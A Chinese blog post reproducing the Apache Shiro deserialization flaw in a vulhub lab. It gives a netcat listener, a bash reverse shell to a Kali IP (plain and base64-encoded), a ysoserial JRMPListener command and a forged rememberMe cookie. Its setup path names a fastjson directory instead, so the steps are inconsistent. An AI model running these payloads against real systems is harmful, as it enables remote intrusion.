复现Apache shiro漏洞

最新推荐文章于 2025-05-18 16:55:00 发布
最新推荐文章于 2025-05-18 16:55:00 发布
阅读量350 收藏 6
点赞数 4
文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maogs/article/details/143828183
版权

TargetMachine

cd /var/local/soft/

/var/local/soft/vulhub-master/fastjson/1.2.47-rce

docker-compose build (拉取镜像、创建容器)

docker-compose up -d (启动容器,自动拉取)

http://192.168.23.151:8080/login

Attacker

Kali机器(192.168.23.133)

nc -lvp 7777

bash -i >& /dev/tcp/192.168.23.133/7777 0>&1

工具:https://ares-x.com/tools/runtime-exec/

结果:

bash -c

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzLjEzMy83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 " bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzLjEzMy83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

Kali机器(192.168.142.132)

pip3 install pycryptodome #先安装加密模块

python3 shiro.py 192.168.23.133:8888

结果:

rememberMe=3+drH8gkQ92frOI6nq5sI6ugp7L0uGFJ74YCE/LnDJTAzeNfplK1EwC7WRrSjfcSkaefDsq/TIMSPQNjXeRh6X/BtafSiQd3qfLipdt3XBmwMAD8jyyhHb3fsWuvSCBYhGr0SuumdB4eQZ4yoBDQ+ghWurzgKecr1npZ99toI16oDXQfV8Udvk65dJkzP26ZDZNYcB+dB4GB+cRWAltF1lHcFzG8HIIARROejouSw8Ryfzvn438k1LwwFtI0de2q+9Dl9Yi9Br3GxsUTAhJQM9q+999Xo5HaG+1qWURYJfL8ZfUDtLmHK2Fr4HZbn2y4WXFXe4DAlb1cpIBIN2adTwyUXMo2h3vlGIaaV6EW2WnKZ7kB7EiCh/KsBEXnpglD4UKD3GrbO+B4i9hElS1/iw==

观浩
关注
Apache Shiro漏洞复现
牟先生的学习博客
09-10 1246
Apache Shiro 认证绕过漏洞 CVE-2020-1957 1. 漏洞描述 Apache Shiro 1.5.2之前版本中存在安全漏洞。攻击者可借助特制的请求利用该漏洞绕过身份验证。 Shiro框架通过拦截器功能来对用户访问权限进行控制,如anon, authc等拦截器。anon为匿名拦截器,不需要登录即可访问;authc为登录拦截器,需要登录才可以访问。可以通过构造恶意的URL进行越权实现未授权访问。 2.环境搭建 之前已经搭建过vulhub环境,直接进入vulhub/shiro/CVE-2020
漏洞复现Shiro 反序列化漏洞
2301_80115097的博客
11-08 2429
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
Apache Shiro 漏洞复现
来日可期的博客
10-10 1083
Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。在代码中全局搜索 “setCipherKey(Base64.decode(” 关键字,或者"setCipherKey"方法,Base64.decode()中的字符串就是shiro的密钥,要确保该密钥的安全性,千万不要使用公开的密钥。利用Shiro工具进行链接。
apache shiro漏洞复现
赵花花08042的博客
12-13 868
Shiro框架下,用户登陆成功后会生成一个经过加密的Cookie。
shiro漏洞复现
ubaichu的博客
09-16 1231
shiro漏洞复现
复现Apache Shiro 1.2.4反序列化漏洞
qq_63526413的博客
06-05 226
安装python2环境,并把shiro.exploit.py脚本和他调用的ysoserial.jar放入。复现Apache Shiro 1.2.4反序列化漏洞。安装pycrypto pycryptodome脚本。安装python2中插件。安装request脚本。
Apache shiro 漏洞总结
星落的博客
08-01 4760
Apache shiro 漏洞总结 Apache shiro是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、密码和会话管理。
漏洞复现Apache_Shiro_1.2.4_反序列化漏洞(CVE-2016-4437)
过期的秋刀鱼
11-05 996
由于使用了aes加密,想要成功利用漏洞则需要获取ase的加密秘钥,而在shiro的1.2.4之前的版本中使用的硬编码。其中默认秘钥的b ase64编码后的值为kPH+bIxk5D2deZiIxcaaaA==,这里就可以通过构造恶意的序列化对象进行编码,加密,然后欧威cooike加密发送,服务端接受后会解密并触发反序列化漏洞。cookie的key为rememberme,cookie的值是经过对相关的信息进行序列化,然后实用aes加密,最后在使用b ase64编码处理形成的。字段,登陆成功的话,返回包。
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
网络空间安全学习
11-02 2014
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞
web13170611647的博客
08-26 223
Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。...
Apache Shiro 认证绕过漏洞 CVE-2020-1957 漏洞复现
2301_79018395的博客
10-17 608
CVE-2020-1957,Spring Boot中使用 Apache Shiro 进行身份验证、权限控制时,可以精心构造恶意的URL,利用 Apache Shiro 和 Spring Boot 对URL的处理的差异化,可以绕过 Apache Shiro 对 Spring Boot 中的 Servlet 的权限控制,越权并实现未授权访问。Apache Shiro 是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。直接绕过权限校验,进入管理界面。
详细shiro漏洞复现及利用方法(CVE-2016-4437)
热门推荐
dreamthe的博客
04-26 3万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
Jsoup库和Apache HttpClient库有什么区别?
one6688的博客
05-18 968
可以自定义请求头、请求体等,以满足复杂的请求需求。
cmd脚本-bat批处理-AdobeRemovePanel.zip
05-22
cmd脚本-bat批处理-AdobeRemovePanel.zip
HTML、CSS与JavaScript构建学生信息管理系统
最新发布
05-22
好的,以下是重新表述后的内容: 本次学生信息管理系统的效果页面代码较为复杂,主要涉及HTML、JS和CSS。在实现过程中,遇到了以下难点: 页面中有一个复选框,通过它的checked属性可以判断是否被选中。当点击该复选框时,需要将当前页面的这一列所有复选框的checked属性设置为相同的值,从而实现全选功能。 要实现仅选择当前页的功能,首先需要获取当前页面的页码,记为page。由于每一页设定只显示10条内容,因此可以通过以下规则计算当前页的起始条目索引:当前页的开始条数为(page - 1) * 10。 如果还有其他问题,可以评论或者通过邮箱(1079349989@qq.com)联系我。完整的代码可以在我的GitHub中找到,GitHub链接在本页面。
基于滑模观测器的无位置传感器控制Simulink永磁同步电机(PMSM)仿真模型 附资料 · 滑模观测器
05-22
内容概要:本文详细介绍了基于Simulink仿真平台的永磁同步电机(PMSM)滑模观测器无位置传感器控制策略的建模方法和技术细节。主要内容涵盖滑模观测器的工作原理,即通过电流观测反电动势并从中提取转子位置信息,以及具体实现步骤如滑模面设计、坐标变换、反电动势观测器和锁相环(PLL)设计等。文中还提供了MATLAB代码片段,帮助理解和实现关键部分。此外,针对常见的数值稳定性和参数调整问题给出了实用建议。 适合人群:从事电机控制系统设计的研究人员、工程师及高校相关专业师生。 使用场景及目标:①掌握PMSM无位置传感器控制的基本理论;②学会利用Simulink构建高效的滑模观测器控制模型;③解决实际工程中遇到的技术难题,提高系统性能。 其他说明:文章不仅提供理论指导,还包括大量实践经验分享,有助于读者快速上手并在实践中不断优化模型。
python+opencv简谱识别音频生成系统源码含GUI界面+详细运行教程+数据.zip
05-22
python+opencv简谱识别音频生成系统源码含GUI界面+详细运行教程+数据 一、项目简介 提取简谱中的音乐信息,依据识别到的信息生成midi文件。 Extract music information from musical scores and generate a midi file according to it. 二、项目运行环境 python=3.11.1 第三方库依赖 opencv-python=4.7.0.68 numpy=1.24.1 可以使用命令 pip install -r requirements.txt 来安装所需的第三方库。 三、项目运行步骤 3.1 命令行运行 运行main.py。 输入简谱路径:支持图片或文件夹,相对路径或绝对路径都可以。 输入简谱主音:它通常在第一页的左上角“1=”之后。 输入简谱速度:即每分钟拍数,同在左上角。 选择是否输出程序中间提示信息:请输入Y或N(不区分大小写,下同)。 选择匹配精度:请输入L或M或H,对应低/中/高精度,一般而言输入L即可。 选择使用的线程数:一般与CPU核数相同即可。虽然python的线程不是真正的多线程,但仍能起到加速作用。 估算字符上下间距:这与简谱中符号的密集程度有关,一般来说纵向符号越稀疏,这个值需要设置得越大,范围通常在1.0-2.5。 二值化算法:使用全局阈值则跳过该选项即可,或者也可输入OTSU、采用大津二值化算法。 设置全局阈值:如果上面选择全局阈值则需要手动设置全局阈值,对于.\test.txt中所提样例,使用全局阈值并在后面设置为160即可。 手动调整中间结果:若输入Y/y,则在识别简谱后会暂停代码,并生成一份txt文件,在其中展示识别结果,此时用户可以通过修改这份txt文件来更正识别结果。 如果选择文件夹的话,还可以选择所选文件夹中不需要识别的文件以排除干扰
cmd-bat-批处理-脚本-mshta-weekNumber.zip
05-22
cmd-bat-批处理-脚本-mshta-weekNumber.zip
分析Apache Shiro漏洞CVE-2020-17523的两种绕过方法
搭建这样的测试环境,需要对Shiro和Spring的集成有深入的理解,以确保能够正确复现漏洞,并进行后续的安全测试和验证。 POC测试: 文档中提到了两种绕过Shiro认证的姿势: 1. 第一种姿势描述了通过在HTTP请求中使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值